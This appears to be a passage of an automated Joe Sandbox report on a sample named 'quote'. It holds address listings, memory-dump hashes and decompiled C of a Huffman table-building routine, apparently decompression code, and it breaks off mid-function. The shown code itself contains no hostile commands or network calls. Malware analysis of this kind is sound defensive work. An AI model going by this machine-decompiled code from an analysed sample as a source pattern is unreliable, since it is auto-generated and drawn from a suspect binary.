                                                                                      0x0040723d
                                                                                      0x00407242
                                                                                      0x00407244
                                                                                      0x00407245
                                                                                      0x00407246
                                                                                      0x00407247
                                                                                      0x0040724d
                                                                                      0x00407250
                                                                                      0x00407253
                                                                                      0x00407256
                                                                                      0x00407258
                                                                                      0x0040725e
                                                                                      0x0040725e
                                                                                      0x00407261
                                                                                      0x00407261
                                                                                      0x00407261
                                                                                      0x00407261
                                                                                      0x0040726a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040726f
                                                                                      0x0040726f
                                                                                      0x00407272
                                                                                      0x00407275
                                                                                      0x00407277
                                                                                      0x0040730e
                                                                                      0x0040730e
                                                                                      0x00407311
                                                                                      0x00407313
                                                                                      0x00407314
                                                                                      0x00407315
                                                                                      0x00407318
                                                                                      0x00000000
                                                                                      0x00407318
                                                                                      0x0040727d
                                                                                      0x0040727d
                                                                                      0x00407283
                                                                                      0x00407285
                                                                                      0x004072aa
                                                                                      0x004072ad
                                                                                      0x004072b3
                                                                                      0x004072b8
                                                                                      0x004072be
                                                                                      0x004072c4
                                                                                      0x004072c6
                                                                                      0x004072c9
                                                                                      0x004072d2
                                                                                      0x004072d8
                                                                                      0x004072d8
                                                                                      0x004072cb
                                                                                      0x004072cd
                                                                                      0x004072cf
                                                                                      0x004072cf
                                                                                      0x004072da
                                                                                      0x004072e0
                                                                                      0x004072e2
                                                                                      0x004072e5
                                                                                      0x004072e7
                                                                                      0x004072ed
                                                                                      0x004072ef
                                                                                      0x004072f1
                                                                                      0x004072f3
                                                                                      0x004072f5
                                                                                      0x004072f8
                                                                                      0x00407301
                                                                                      0x00407304
                                                                                      0x00407304
                                                                                      0x004072fa
                                                                                      0x004072fa
                                                                                      0x004072fd
                                                                                      0x004072fd
                                                                                      0x004072f8
                                                                                      0x004072ef
                                                                                      0x00407306
                                                                                      0x00407308
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407308
                                                                                      0x00407287
                                                                                      0x00407287
                                                                                      0x0040728d
                                                                                      0x00407293
                                                                                      0x00407295
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407297
                                                                                      0x00407297
                                                                                      0x00407299
                                                                                      0x0040729b
                                                                                      0x004072a2
                                                                                      0x004072a2
                                                                                      0x004072a4
                                                                                      0x0040729d
                                                                                      0x0040729d
                                                                                      0x0040729f
                                                                                      0x0040729f
                                                                                      0x004072a6
                                                                                      0x004072a8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407320
                                                                                      0x00407320
                                                                                      0x00407323
                                                                                      0x00407325
                                                                                      0x00407328
                                                                                      0x0040732b
                                                                                      0x0040732b
                                                                                      0x0040732b
                                                                                      0x0040732b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004069d9
                                                                                      0x004069bd
                                                                                      0x00000000
                                                                                      0x004069c3
                                                                                      0x004069c6
                                                                                      0x004069d0
                                                                                      0x004069d3
                                                                                      0x004069d6
                                                                                      0x00000000
                                                                                      0x004069d6
                                                                                      0x004069bd
                                                                                      0x004069e1
                                                                                      0x004069e4
                                                                                      0x004069e8
                                                                                      0x004069f2
                                                                                      0x004069fc
                                                                                      0x004069ff
                                                                                      0x00406a05
                                                                                      0x00406b39
                                                                                      0x00406b3b
                                                                                      0x00406b41
                                                                                      0x00406b44
                                                                                      0x00406b47
                                                                                      0x00000000
                                                                                      0x00406b47
                                                                                      0x00406a0b
                                                                                      0x00406a0b
                                                                                      0x00406a0c
                                                                                      0x00406a64
                                                                                      0x00406a64
                                                                                      0x00406a6b
                                                                                      0x00406b11
                                                                                      0x00406b11
                                                                                      0x00406b16
                                                                                      0x00406b19
                                                                                      0x00406b1e
                                                                                      0x00406b21
                                                                                      0x00406b26
                                                                                      0x00406b29
                                                                                      0x00406b2e
                                                                                      0x00406b31
                                                                                      0x00406b31
                                                                                      0x00000000
                                                                                      0x00406a71
                                                                                      0x00406a71
                                                                                      0x00406a71
                                                                                      0x00406a71
                                                                                      0x00406a75
                                                                                      0x00406a75
                                                                                      0x00406a97
                                                                                      0x00406a9a
                                                                                      0x00406a9c
                                                                                      0x00406a9f
                                                                                      0x00406aa4
                                                                                      0x00406a7a
                                                                                      0x00406a7a
                                                                                      0x00406a7f
                                                                                      0x00406a81
                                                                                      0x00406a83
                                                                                      0x00406a88
                                                                                      0x00406a8e
                                                                                      0x00406a93
                                                                                      0x00406a95
                                                                                      0x00406a95
                                                                                      0x00406a8a
                                                                                      0x00406a8a
                                                                                      0x00406a8a
                                                                                      0x00406a88
                                                                                      0x00000000
                                                                                      0x00406aa6
                                                                                      0x00406ad3
                                                                                      0x00406ad8
                                                                                      0x00406ada
                                                                                      0x00406adb
                                                                                      0x00406add
                                                                                      0x00406ade
                                                                                      0x00406ade
                                                                                      0x00406ade
                                                                                      0x00406b06
                                                                                      0x00406b0b
                                                                                      0x00406b0b
                                                                                      0x00000000
                                                                                      0x00406b0b
                                                                                      0x00406aa4
                                                                                      0x00406a6b
                                                                                      0x00406a0e
                                                                                      0x00406a0e
                                                                                      0x00406a0f
                                                                                      0x00406a59
                                                                                      0x00000000
                                                                                      0x00406a59
                                                                                      0x00406a11
                                                                                      0x00406a12
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406b6e
                                                                                      0x00406b6e
                                                                                      0x00406b6e
                                                                                      0x00406b71
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406b4e
                                                                                      0x00406b4e
                                                                                      0x00406b52
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406b58
                                                                                      0x00406b58
                                                                                      0x00406b5b
                                                                                      0x00406b5e
                                                                                      0x00406b63
                                                                                      0x00406b65
                                                                                      0x00406b68
                                                                                      0x00406b6b
                                                                                      0x00406b6b
                                                                                      0x00406b6b
                                                                                      0x00406b73
                                                                                      0x00406b73
                                                                                      0x00406b76
                                                                                      0x00406b78
                                                                                      0x00406b7d
                                                                                      0x00406b80
                                                                                      0x00406b82
                                                                                      0x00406b85
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406b8b
                                                                                      0x00406b8b
                                                                                      0x00406b8d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406b93
                                                                                      0x00406b93
                                                                                      0x00406b97
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406b9d
                                                                                      0x00406b9d
                                                                                      0x00406ba0
                                                                                      0x00406ba2
                                                                                      0x00406c40
                                                                                      0x00406c40
                                                                                      0x00406c43
                                                                                      0x00406c45
                                                                                      0x00406c45
                                                                                      0x00406c48
                                                                                      0x00406c4b
                                                                                      0x00406c4d
                                                                                      0x00406c4f
                                                                                      0x00406c51
                                                                                      0x00406c51
                                                                                      0x00406c5a
                                                                                      0x00406c5f
                                                                                      0x00406c62
                                                                                      0x00406c65
                                                                                      0x00406c68
                                                                                      0x00406c6b
                                                                                      0x00406c6b
                                                                                      0x00406c6b
                                                                                      0x00406c6e
                                                                                      0x00406c74
                                                                                      0x00406c74
                                                                                      0x00406c7a
                                                                                      0x00406c7a
                                                                                      0x00406c7a
                                                                                      0x00000000
                                                                                      0x00406c6e
                                                                                      0x00406ba8
                                                                                      0x00406ba8
                                                                                      0x00406bae
                                                                                      0x00406bb1
                                                                                      0x00406bb3
                                                                                      0x00406bde
                                                                                      0x00406be1
                                                                                      0x00406be7
                                                                                      0x00406bec
                                                                                      0x00406bf2
                                                                                      0x00406bf8
                                                                                      0x00406bfa
                                                                                      0x00406bfd
                                                                                      0x00406c06
                                                                                      0x00406c0c
                                                                                      0x00406c0c
                                                                                      0x00406bff
                                                                                      0x00406c01
                                                                                      0x00406c03
                                                                                      0x00406c03
                                                                                      0x00406c0e
                                                                                      0x00406c14
                                                                                      0x00406c17
                                                                                      0x00406c19
                                                                                      0x00406c1b
                                                                                      0x00406c21
                                                                                      0x00406c23
                                                                                      0x00406c25
                                                                                      0x00406c28
                                                                                      0x00406c31
                                                                                      0x00406c31
                                                                                      0x00406c33
                                                                                      0x00406c2a
                                                                                      0x00406c2a
                                                                                      0x00406c2d
                                                                                      0x00406c2d
                                                                                      0x00406c35
                                                                                      0x00406c35
                                                                                      0x00406c23
                                                                                      0x00406c38
                                                                                      0x00406c3a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c3a
                                                                                      0x00406bb5
                                                                                      0x00406bb5
                                                                                      0x00406bbb
                                                                                      0x00406bc1
                                                                                      0x00406bc3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406bc5
                                                                                      0x00406bc5
                                                                                      0x00406bc7
                                                                                      0x00406bc9
                                                                                      0x00406bcc
                                                                                      0x00406bd3
                                                                                      0x00406bd3
                                                                                      0x00406bd5
                                                                                      0x00406bce
                                                                                      0x00406bce
                                                                                      0x00406bd0
                                                                                      0x00406bd0
                                                                                      0x00406bd7
                                                                                      0x00406bd9
                                                                                      0x00406bdc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406ce0
                                                                                      0x00406ce3
                                                                                      0x00406ce6
                                                                                      0x00406cec
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406ec3
                                                                                      0x00406ec3
                                                                                      0x00406ec3
                                                                                      0x00406ec6
                                                                                      0x00406ec9
                                                                                      0x00406ecb
                                                                                      0x00406ece
                                                                                      0x00406ed4
                                                                                      0x00406edb
                                                                                      0x00406edd
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406db1
                                                                                      0x00406db1
                                                                                      0x00406dd9
                                                                                      0x00406dd9
                                                                                      0x00406dd9
                                                                                      0x00406ddb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406db9
                                                                                      0x00406db9
                                                                                      0x00406dbd
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406dc3
                                                                                      0x00406dc3
                                                                                      0x00406dc6
                                                                                      0x00406dc9
                                                                                      0x00406dcc
                                                                                      0x00406dce
                                                                                      0x00406dd0
                                                                                      0x00406dd3
                                                                                      0x00406dd6
                                                                                      0x00406dd6
                                                                                      0x00406dd6
                                                                                      0x00406ddd
                                                                                      0x00406ddd
                                                                                      0x00406de5
                                                                                      0x00406de8
                                                                                      0x00406dee
                                                                                      0x00406df1
                                                                                      0x00406df5
                                                                                      0x00406df9
                                                                                      0x00406dfc
                                                                                      0x00406dff
                                                                                      0x00406e17
                                                                                      0x00406e17
                                                                                      0x00406e1a
                                                                                      0x00406e28
                                                                                      0x00406e2b
                                                                                      0x00406e1c
                                                                                      0x00406e1c
                                                                                      0x00406e1e
                                                                                      0x00406e25
                                                                                      0x00406e25
                                                                                      0x00406e54
                                                                                      0x00406e54
                                                                                      0x00406e54
                                                                                      0x00406e57
                                                                                      0x00406e59
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406e34
                                                                                      0x00406e34
                                                                                      0x00406e38
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406e3e
                                                                                      0x00406e3e
                                                                                      0x00406e41
                                                                                      0x00406e44
                                                                                      0x00406e47
                                                                                      0x00406e49
                                                                                      0x00406e4b
                                                                                      0x00406e4e
                                                                                      0x00406e51
                                                                                      0x00406e51
                                                                                      0x00406e51
                                                                                      0x00406e5b
                                                                                      0x00406e5b
                                                                                      0x00406e5d
                                                                                      0x00406e5f
                                                                                      0x00406e6a
                                                                                      0x00406e6d
                                                                                      0x00406e70
                                                                                      0x00406e72
                                                                                      0x00406e74
                                                                                      0x00406e76
                                                                                      0x00406e79
                                                                                      0x00406e7c
                                                                                      0x00406e81
                                                                                      0x00406e84
                                                                                      0x00406e87
                                                                                      0x00406e8a
                                                                                      0x00406e91
                                                                                      0x00406e94
                                                                                      0x00406e96
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406e9c
                                                                                      0x00406e9c
                                                                                      0x00406ea0
                                                                                      0x00406eb1
                                                                                      0x00406eb1
                                                                                      0x00406eb1
                                                                                      0x00406eb3
                                                                                      0x00406eb3
                                                                                      0x00406eb7
                                                                                      0x00406eb7
                                                                                      0x00406eb7
                                                                                      0x00406eb9
                                                                                      0x00406eba
                                                                                      0x00406ebd
                                                                                      0x00406ebd
                                                                                      0x00406ebd
                                                                                      0x00406ec0
                                                                                      0x00000000
                                                                                      0x00406ec0
                                                                                      0x00406ea2
                                                                                      0x00406ea2
                                                                                      0x00406ea5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406eab
                                                                                      0x00406eab
                                                                                      0x00000000
                                                                                      0x00406eab
                                                                                      0x00406e01
                                                                                      0x00406e01
                                                                                      0x00406e03
                                                                                      0x00406e05
                                                                                      0x00406e08
                                                                                      0x00406e0b
                                                                                      0x00406e0f
                                                                                      0x00406e0f
                                                                                      0x00406ee3
                                                                                      0x00406ee3
                                                                                      0x00406ee6
                                                                                      0x00406eed
                                                                                      0x00406ef1
                                                                                      0x00406ef3
                                                                                      0x00406ef6
                                                                                      0x00406ef9
                                                                                      0x00406efe
                                                                                      0x00406f01
                                                                                      0x00406f03
                                                                                      0x00406f04
                                                                                      0x00406f07
                                                                                      0x00406f12
                                                                                      0x00406f15
                                                                                      0x00406f2c
                                                                                      0x00406f31
                                                                                      0x00406f38
                                                                                      0x00406f3d
                                                                                      0x00406f41
                                                                                      0x00406f43
                                                                                      0x00406f43
                                                                                      0x00406f43
                                                                                      0x00406f46
                                                                                      0x00406f48
                                                                                      0x00000000
                                                                                      0x00406f4e
                                                                                      0x00406f4e
                                                                                      0x00406f52
                                                                                      0x00406f5d
                                                                                      0x00406f70
                                                                                      0x00406f75
                                                                                      0x00406f7a
                                                                                      0x00406f7c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406f82
                                                                                      0x00406f82
                                                                                      0x00406f85
                                                                                      0x00406f87
                                                                                      0x00406f95
                                                                                      0x00406f95
                                                                                      0x00406f98
                                                                                      0x00406f98
                                                                                      0x00406f9b
                                                                                      0x00406f9e
                                                                                      0x00406fa1
                                                                                      0x00406fa4
                                                                                      0x00406fa7
                                                                                      0x00406faa
                                                                                      0x00000000
                                                                                      0x00406faa
                                                                                      0x00406f89
                                                                                      0x00406f89
                                                                                      0x00406f8f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406f8f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040732e
                                                                                      0x0040732e
                                                                                      0x00407334
                                                                                      0x0040733a
                                                                                      0x0040733f
                                                                                      0x00407345
                                                                                      0x0040734b
                                                                                      0x0040734d
                                                                                      0x00407350
                                                                                      0x00407359
                                                                                      0x0040735f
                                                                                      0x0040735f
                                                                                      0x00407352
                                                                                      0x00407354
                                                                                      0x00407356
                                                                                      0x00407356
                                                                                      0x00407361
                                                                                      0x00407363
                                                                                      0x00407366
                                                                                      0x004073a1
                                                                                      0x004073a1
                                                                                      0x00000000
                                                                                      0x00407368
                                                                                      0x00407368
                                                                                      0x00407368
                                                                                      0x0040736e
                                                                                      0x00407371
                                                                                      0x00407373
                                                                                      0x004073a8
                                                                                      0x004073aa
                                                                                      0x00000000
                                                                                      0x004073aa
                                                                                      0x00000000
                                                                                      0x00407373
                                                                                      0x00000000
                                                                                      0x004069b2
                                                                                      0x00407380
                                                                                      0x00000000
                                                                                      0x00407380
                                                                                      0x00406d94
                                                                                      0x00406d96
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406d98
                                                                                      0x00406d98
                                                                                      0x00406d9b
                                                                                      0x00000000
                                                                                      0x00406d9b
                                                                                      0x00406ce0
                                                                                      0x00406ca1
                                                                                      0x00407385
                                                                                      0x00407388
                                                                                      0x0040738a
                                                                                      0x00407393
                                                                                      0x00407399
                                                                                      0x00000000

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                                      • Instruction ID: 1f017aaef81dd0f0ed7cb9892c5a428a4034ef251f890bfd5ca3fce11066bb94
                                                                                      • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                                      • Instruction Fuzzy Hash: 8FE1AA71A04709DFDB24CF58C880BAEB7F5EB45305F15842EE896AB2D1D738AA91CF44
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00407458(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                                                      				signed int _v8;
                                                                                      				unsigned int _v12;
                                                                                      				signed int _v16;
                                                                                      				intOrPtr _v20;
                                                                                      				signed int _v24;
                                                                                      				signed int _v28;
                                                                                      				intOrPtr* _v32;
                                                                                      				signed int* _v36;
                                                                                      				signed int _v40;
                                                                                      				signed int _v44;
                                                                                      				intOrPtr _v48;
                                                                                      				intOrPtr _v52;
                                                                                      				void _v116;
                                                                                      				signed int _v176;
                                                                                      				signed int _v180;
                                                                                      				signed int _v240;
                                                                                      				signed int _t166;
                                                                                      				signed int _t168;
                                                                                      				intOrPtr _t175;
                                                                                      				signed int _t181;
                                                                                      				void* _t182;
                                                                                      				intOrPtr _t183;
                                                                                      				signed int* _t184;
                                                                                      				signed int _t186;
                                                                                      				signed int _t187;
                                                                                      				signed int* _t189;
                                                                                      				signed int _t190;
                                                                                      				intOrPtr* _t191;
                                                                                      				intOrPtr _t192;
                                                                                      				signed int _t193;
                                                                                      				signed int _t195;
                                                                                      				signed int _t200;
                                                                                      				signed int _t205;
                                                                                      				void* _t207;
                                                                                      				short _t208;
                                                                                      				signed char _t222;
                                                                                      				signed int _t224;
                                                                                      				signed int _t225;
                                                                                      				signed int* _t232;
                                                                                      				signed int _t233;
                                                                                      				signed int _t234;
                                                                                      				void* _t235;
                                                                                      				signed int _t236;
                                                                                      				signed int _t244;
                                                                                      				signed int _t246;
                                                                                      				signed int _t251;
                                                                                      				signed int _t254;
                                                                                      				signed int _t256;
                                                                                      				signed int _t259;
                                                                                      				signed int _t262;
                                                                                      				void* _t263;
                                                                                      				void* _t264;
                                                                                      				signed int _t267;
                                                                                      				intOrPtr _t269;
                                                                                      				intOrPtr _t271;
                                                                                      				signed int _t274;
                                                                                      				intOrPtr* _t275;
                                                                                      				unsigned int _t276;
                                                                                      				void* _t277;
                                                                                      				signed int _t278;
                                                                                      				intOrPtr* _t279;
                                                                                      				signed int _t281;
                                                                                      				intOrPtr _t282;
                                                                                      				intOrPtr _t283;
                                                                                      				signed int* _t284;
                                                                                      				signed int _t286;
                                                                                      				signed int _t287;
                                                                                      				signed int _t288;
                                                                                      				signed int _t296;
                                                                                      				signed int* _t297;
                                                                                      				intOrPtr _t298;
                                                                                      				void* _t299;
                                                                                      
                                                                                      				_t278 = _a8;
                                                                                      				_t187 = 0x10;
                                                                                      				memset( &_v116, 0, _t187 << 2);
                                                                                      				_t189 = _a4;
                                                                                      				_t233 = _t278;
                                                                                      				do {
                                                                                      					_t166 =  *_t189;
                                                                                      					_t189 =  &(_t189[1]);
                                                                                      					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                                                      					_t233 = _t233 - 1;
                                                                                      				} while (_t233 != 0);
                                                                                      				if(_v116 != _t278) {
                                                                                      					_t279 = _a28;
                                                                                      					_t267 =  *_t279;
                                                                                      					_t190 = 1;
                                                                                      					_a28 = _t267;
                                                                                      					_t234 = 0xf;
                                                                                      					while(1) {
                                                                                      						_t168 = 0;
                                                                                      						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                                                      							break;
                                                                                      						}
                                                                                      						_t190 = _t190 + 1;
                                                                                      						if(_t190 <= _t234) {
                                                                                      							continue;
                                                                                      						}
                                                                                      						break;
                                                                                      					}
                                                                                      					_v8 = _t190;
                                                                                      					if(_t267 < _t190) {
                                                                                      						_a28 = _t190;
                                                                                      					}
                                                                                      					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                                                      						_t234 = _t234 - 1;
                                                                                      						if(_t234 != 0) {
                                                                                      							continue;
                                                                                      						}
                                                                                      						break;
                                                                                      					}
                                                                                      					_v28 = _t234;
                                                                                      					if(_a28 > _t234) {
                                                                                      						_a28 = _t234;
                                                                                      					}
                                                                                      					 *_t279 = _a28;
                                                                                      					_t181 = 1 << _t190;
                                                                                      					while(_t190 < _t234) {
                                                                                      						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                                                      						if(_t182 < 0) {
                                                                                      							L64:
                                                                                      							return _t168 | 0xffffffff;
                                                                                      						}
                                                                                      						_t190 = _t190 + 1;
                                                                                      						_t181 = _t182 + _t182;
                                                                                      					}
                                                                                      					_t281 = _t234 << 2;
                                                                                      					_t191 = _t299 + _t281 - 0x70;
                                                                                      					_t269 =  *_t191;
                                                                                      					_t183 = _t181 - _t269;
                                                                                      					_v52 = _t183;
                                                                                      					if(_t183 < 0) {
                                                                                      						goto L64;
                                                                                      					}
                                                                                      					_v176 = _t168;
                                                                                      					 *_t191 = _t269 + _t183;
                                                                                      					_t192 = 0;
                                                                                      					_t235 = _t234 - 1;
                                                                                      					if(_t235 == 0) {
                                                                                      						L21:
                                                                                      						_t184 = _a4;
                                                                                      						_t271 = 0;
                                                                                      						do {
                                                                                      							_t193 =  *_t184;
                                                                                      							_t184 =  &(_t184[1]);
                                                                                      							if(_t193 != _t168) {
                                                                                      								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                                                      								_t236 =  *_t232;
                                                                                      								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
                                                                                      								 *_t232 = _t236 + 1;
                                                                                      							}
                                                                                      							_t271 = _t271 + 1;
                                                                                      						} while (_t271 < _a8);
                                                                                      						_v16 = _v16 | 0xffffffff;
                                                                                      						_v40 = _v40 & 0x00000000;
                                                                                      						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                                                      						_t195 = _v8;
                                                                                      						_t186 =  ~_a28;
                                                                                      						_v12 = _t168;
                                                                                      						_v180 = _t168;
                                                                                      						_v36 = 0x432190;
                                                                                      						_v240 = _t168;
                                                                                      						if(_t195 > _v28) {
                                                                                      							L62:
                                                                                      							_t168 = 0;
                                                                                      							if(_v52 == 0 || _v28 == 1) {
                                                                                      								return _t168;
                                                                                      							} else {
                                                                                      								goto L64;
                                                                                      							}
                                                                                      						}
                                                                                      						_v44 = _t195 - 1;
                                                                                      						_v32 = _t299 + _t195 * 4 - 0x70;
                                                                                      						do {
                                                                                      							_t282 =  *_v32;
                                                                                      							if(_t282 == 0) {
                                                                                      								goto L61;
                                                                                      							}
                                                                                      							while(1) {
                                                                                      								_t283 = _t282 - 1;
                                                                                      								_t200 = _a28 + _t186;
                                                                                      								_v48 = _t283;
                                                                                      								_v24 = _t200;
                                                                                      								if(_v8 <= _t200) {
                                                                                      									goto L45;
                                                                                      								}
                                                                                      								L31:
                                                                                      								_v20 = _t283 + 1;
                                                                                      								do {
                                                                                      									_v16 = _v16 + 1;
                                                                                      									_t296 = _v28 - _v24;
                                                                                      									if(_t296 > _a28) {
                                                                                      										_t296 = _a28;
                                                                                      									}
                                                                                      									_t222 = _v8 - _v24;
                                                                                      									_t254 = 1 << _t222;
                                                                                      									if(1 <= _v20) {
                                                                                      										L40:
                                                                                      										_t256 =  *_a36;
                                                                                      										_t168 = 1 << _t222;
                                                                                      										_v40 = 1;
                                                                                      										_t274 = _t256 + 1;
                                                                                      										if(_t274 > 0x5a0) {
                                                                                      											goto L64;
                                                                                      										}
                                                                                      									} else {
                                                                                      										_t275 = _v32;
                                                                                      										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                                                      										if(_t222 >= _t296) {
                                                                                      											goto L40;
                                                                                      										}
                                                                                      										while(1) {
                                                                                      											_t222 = _t222 + 1;
                                                                                      											if(_t222 >= _t296) {
                                                                                      												goto L40;
                                                                                      											}
                                                                                      											_t275 = _t275 + 4;
                                                                                      											_t264 = _t263 + _t263;
                                                                                      											_t175 =  *_t275;
                                                                                      											if(_t264 <= _t175) {
                                                                                      												goto L40;
                                                                                      											}
                                                                                      											_t263 = _t264 - _t175;
                                                                                      										}
                                                                                      										goto L40;
                                                                                      									}
                                                                                      									_t168 = _a32 + _t256 * 4;
                                                                                      									_t297 = _t299 + _v16 * 4 - 0xec;
                                                                                      									 *_a36 = _t274;
                                                                                      									_t259 = _v16;
                                                                                      									 *_t297 = _t168;
                                                                                      									if(_t259 == 0) {
                                                                                      										 *_a24 = _t168;
                                                                                      									} else {
                                                                                      										_t276 = _v12;
                                                                                      										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                                                      										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                                                      										_a5 = _a28;
                                                                                      										_a4 = _t222;
                                                                                      										_t262 = _t276 >> _t186;
                                                                                      										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                                                      										 *(_t298 + _t262 * 4) = _a4;
                                                                                      									}
                                                                                      									_t224 = _v24;
                                                                                      									_t186 = _t224;
                                                                                      									_t225 = _t224 + _a28;
                                                                                      									_v24 = _t225;
                                                                                      								} while (_v8 > _t225);
                                                                                      								L45:
                                                                                      								_t284 = _v36;
                                                                                      								_a5 = _v8 - _t186;
                                                                                      								if(_t284 < 0x432190 + _a8 * 4) {
                                                                                      									_t205 =  *_t284;
                                                                                      									if(_t205 >= _a12) {
                                                                                      										_t207 = _t205 - _a12 + _t205 - _a12;
                                                                                      										_v36 =  &(_v36[1]);
                                                                                      										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                                                      										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                                                      									} else {
                                                                                      										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                                                      										_t208 =  *_t284;
                                                                                      										_v36 =  &(_t284[1]);
                                                                                      									}
                                                                                      									_a6 = _t208;
                                                                                      								} else {
                                                                                      									_a4 = 0xc0;
                                                                                      								}
                                                                                      								_t286 = 1 << _v8 - _t186;
                                                                                      								_t244 = _v12 >> _t186;
                                                                                      								while(_t244 < _v40) {
                                                                                      									 *(_t168 + _t244 * 4) = _a4;
                                                                                      									_t244 = _t244 + _t286;
                                                                                      								}
                                                                                      								_t287 = _v12;
                                                                                      								_t246 = 1 << _v44;
                                                                                      								while((_t287 & _t246) != 0) {
                                                                                      									_t287 = _t287 ^ _t246;
                                                                                      									_t246 = _t246 >> 1;
                                                                                      								}
                                                                                      								_t288 = _t287 ^ _t246;
                                                                                      								_v20 = 1;
                                                                                      								_v12 = _t288;
                                                                                      								_t251 = _v16;
                                                                                      								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                                                      									L60:
                                                                                      									if(_v48 != 0) {
                                                                                      										_t282 = _v48;
                                                                                      										_t283 = _t282 - 1;
                                                                                      										_t200 = _a28 + _t186;
                                                                                      										_v48 = _t283;
                                                                                      										_v24 = _t200;
                                                                                      										if(_v8 <= _t200) {
                                                                                      											goto L45;
                                                                                      										}
                                                                                      										goto L31;
                                                                                      									}
                                                                                      									break;
                                                                                      								} else {
                                                                                      									goto L58;
                                                                                      								}
                                                                                      								do {
                                                                                      									L58:
                                                                                      									_t186 = _t186 - _a28;
                                                                                      									_t251 = _t251 - 1;
                                                                                      								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                                                      								_v16 = _t251;
                                                                                      								goto L60;
                                                                                      							}
                                                                                      							L61:
                                                                                      							_v8 = _v8 + 1;
                                                                                      							_v32 = _v32 + 4;
                                                                                      							_v44 = _v44 + 1;
                                                                                      						} while (_v8 <= _v28);
                                                                                      						goto L62;
                                                                                      					}
